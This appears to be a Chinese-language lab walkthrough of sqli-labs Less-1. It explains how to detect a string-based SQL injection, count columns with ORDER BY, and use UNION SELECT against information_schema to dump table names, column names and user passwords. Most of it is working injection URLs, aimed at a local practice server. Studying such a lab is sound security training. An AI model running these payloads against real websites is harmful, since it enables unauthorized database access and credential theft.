Sqlliab

Less1

首先来看源码

 

mysql报错注入payload mysql注入语句_mysql报错注入payload

 

我们发现直接将id的字段丢给了查询sql语句函数。输入地址看看效果

http://192.168.16.135/sqli-labs-master/Less-1/?id=1

 

mysql报错注入payload mysql注入语句_mysql报错注入payload_02

 

我们发现当id=1的时候,当前的执行语句为:

SELECT * FROM users WHERE id='1' LIMIT 0,1

我们首先试试判断sql注入的常用手法:加个’试试效果

http://192.168.16.135/sqli-labs-master/Less-1/?id=1'

 

mysql报错注入payload mysql注入语句_sql语句_03

发现就会报错,为什么会报错呢,我们可以清楚的看到sql注入的执行语句为:

SELECT * FROM users WHERE id='1'' LIMIT 0,1

因为id=’1’’,这是一个错误的sql语句,因此会出现报错信息。

我们在来试试另一个判断注入点的方法:and 1=1 和and 1=2

首先输入and1=1

http://192.168.16.135/sqli-labs-master/Less-1/?id=1 and 1=1

 

mysql报错注入payload mysql注入语句_mysql报错注入payload_04

发现执行的语句SELECT * FROM users WHERE id='1 and 1=1' LIMIT 0,1

我们发现1 and 1=1作为ID的值被传入sql语句进行查询,无论怎样查询到的结果只是id作为1的值。输入and 1=3看看。

http://192.168.16.135/sqli-labs-master/Less-1/?id=1 and 1=3

 

mysql报错注入payload mysql注入语句_数据库_05

 

怎么样才能让sql语句执行 and语句呢?可以发现id的内容不是字符串吗,我们可以尝试闭合字符串。

 

 

mysql报错注入payload mysql注入语句_sql_06

mysql报错注入payload mysql注入语句_sql_07

 

 

http://192.168.16.135/sqli-labs-master/Less-1/?id=1 'and 1='1成进行了闭合字段,在看看and1=2的内容

http://192.168.16.135/sqli-labs-master/Less-1/?id=1 'and 1='2

 

mysql报错注入payload mysql注入语句_mysql报错注入payload_08

 

我们发现执行and1=1和执行and1=2的页面反馈效果不同,说明存在sql注入点。

 

mysql报错注入payload mysql注入语句_数据库_09

 

使用order by 字段,发现执行的sql语句为:

SELECT * FROM users WHERE id='1 order by 9' LIMIT 0,1

发现和执行and 的是一个道理,只不过在执行and的语句是我没有截断sql语句(说明这片文章的思路有一点小问题),在常规的sql注入过程中,如果我们发现是确实存在sql注入点的时候。我们就应该截断sql语句,在这片文章里就是“’LIMIT 0,1”。干掉sql语句的多余部分。那么问题来了我们怎么样才能干掉后面的部分?有没有一点的思路呢?

注释,对就是注释你没有想错,sql语句中一共有三种注释符,分别是#,/**/,--。

首先说明这三种注释符的意义

Select ID from user # 表示这条sql语句到此结束,常用语单行注释。

Select id from user --  表示这条语句到此结束,常用语多行注释。主意这里的--双换线要求前后至少有一个空格,在sql语句的空格用+表示。

/*注释sql语句的*/ 通常用于大段的注释。

首先我们来干掉多余的sql语句。

http://192.168.16.135/sqli-labs-master/Less-1/?id=1' --+,正常返回页面,说明sql后面的LIMIT 0,1被干掉。

 

mysql报错注入payload mysql注入语句_mysql报错注入payload_10

 

执行语句http://192.168.16.135/sqli-labs-master/Less-1/?id=1' #

 

mysql报错注入payload mysql注入语句_Less_11

 

居然会爆错一大堆,为啥呢?看执行的sql语句:

SELECT * FROM users WHERE id='1' ' LIMIT 0,1

说明没有被干掉,那么怎么办呢?在sql注入的过程经常使用的一招就是编码,是用url编码问题。常用的URL编码%20代表空格,%23表示#,说一个问题,URL和16进制有个相似的地方就是%23和0x23。都代表的#。感兴趣可以下去研究一下。

http://192.168.16.135/sqli-labs-master/Less-1/?id=1' %23,返回正常。

 

mysql报错注入payload mysql注入语句_sql_12

 

判断字段长度

Oder by  原理

T1表中有三个字段的时候,我们使用查询语句,

Select * from t1 where id =1 order by 3,返回正常数据。

 

mysql报错注入payload mysql注入语句_sql_13

 

使用select *  from t1 where id =1 order by 4,发现sql语句报错,并且返回没有找到这样的字段。

 

mysql报错注入payload mysql注入语句_数据库_14

 

当t1表有四个字段的时候,使用查询语句

Select * from t1 where id =1 order by 4,返回数据。

 

mysql报错注入payload mysql注入语句_sql_15

 

Select * from t1 where id =1 order by 5,

 

mysql报错注入payload mysql注入语句_数据库_16

 

返回错误。也就是说order by 就是来判断表中到底有多少列。如果表中有3列,那么order by 3 查询到数据,如果 order by 4,则这个表中没有4列数据,报错。熟悉了原理来看看利用过程。

http://192.168.16.135/sqli-labs-master/Less-1/?id=1' order by 9%23

 

mysql报错注入payload mysql注入语句_sql语句_17

 

发现Unknown column '9' in 'order clause',说明不存在该字段。使用二分法来判断其他的数字。

 

mysql报错注入payload mysql注入语句_Less_18

 

http://192.168.16.135/sqli-labs-master/Less-1/?id=1' order by 3%23,发现3有页面。

 

mysql报错注入payload mysql注入语句_数据库_19

 

http://192.168.16.135/sqli-labs-master/Less-1/?id=1' order by 4%23

发现4没有,则说明就只有3个字段。

 

mysql报错注入payload mysql注入语句_Less_20

 

接下来就是查询字段,使用union select 来查询的原理。执行id=1返回正常,

 

mysql报错注入payload mysql注入语句_数据库_21

 

执行-1返回的是空字段。

 

mysql报错注入payload mysql注入语句_Less_22

 

执行-1 union select 1,返回name

mysql报错注入payload mysql注入语句_mysql报错注入payload_23

我们可以这样理解

Select name from t1 where id =-1 这条语句执行的结果为空

Uninon select 1这条语句才能查询到结果,给页面返回查询到的数字。

如何利用呢?也就说只要我们使union前面的sql语句执行的结果为空。才能让页面显示出union 后面的sql语句执行的结果。我们使用and来验证一下。

Select name from t1 where id =1 and 1=1,发现返回的是一个字段。

 

mysql报错注入payload mysql注入语句_mysql报错注入payload_24

 

Select name from t1 where id =1 and 1=2,发现查询到的结果为空

 

mysql报错注入payload mysql注入语句_Less_25

 

Select name from t1 where id =1 and 1=2 union select 1,

使用联合查询,查询到数据。

 

mysql报错注入payload mysql注入语句_Less_26

 

熟悉了联合查询的原理。我们来在页面中使用联合查询获取字段。

http://192.168.16.135/sqli-labs-master/Less-1/?id=-1' union select 1,2,3%23

 

mysql报错注入payload mysql注入语句_sql_27

 

看一下执行的sql语句:

SELECT * FROM users WHERE id='-1' union select 1,2,3#

注意:截图中的执行SQL语句不正确,因为我们使用了#注释以后, #后面的内容已被sql过滤。也就是说#后面的东西为空。

我们发现在页面中返回了2,3两个字段。接下来利用在页面显示的字段来判断sql的版本和数据库。

http://192.168.16.135/sqli-labs-master/Less-1/?id=-1' union select 1,version(),database ()%23

 

mysql报错注入payload mysql注入语句_Less_28

 

发现MySQL的版本是5.5.53>5.0,大于5.0版本的mysql有一个数据库information_schema这个数据库里存储所有有MySQL的操作。我们看到在information_schema中有个表是tables,这个表里存储所有的表的属性。

 

mysql报错注入payload mysql注入语句_mysql报错注入payload_29

 

在columns中存储所有有关列的信息。

 

mysql报错注入payload mysql注入语句_mysql报错注入payload_30

 

http://192.168.16.135/sqli-labs-master/Less-1/?id=-1' union select 1,2, group_concat(table_name) from information_schema.tables where table_schema='security'%23,获取表名

 

mysql报错注入payload mysql注入语句_sql_31

 

也可以使用

http://192.168.16.135/sqli-labs-master/Less-1/?id=-1' union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=database()%23

 

mysql报错注入payload mysql注入语句_Less_32

 

获取列名,以users表为例。

http://192.168.16.135/sqli-labs-master/Less-1/?id=-1' union select 1,version(),group_concat(column_name)from information_schema.columns where table_name='users'%23

 

mysql报错注入payload mysql注入语句_Less_33

 

获取数据。

http://192.168.16.135/sqli-labs-master/Less-1/?id=-1' union select 1,version(),group_concat(username,password) from users%23

 

mysql报错注入payload mysql注入语句_数据库_34

 

得到数据库的管理的用户名和密码。那么接下来怎么做?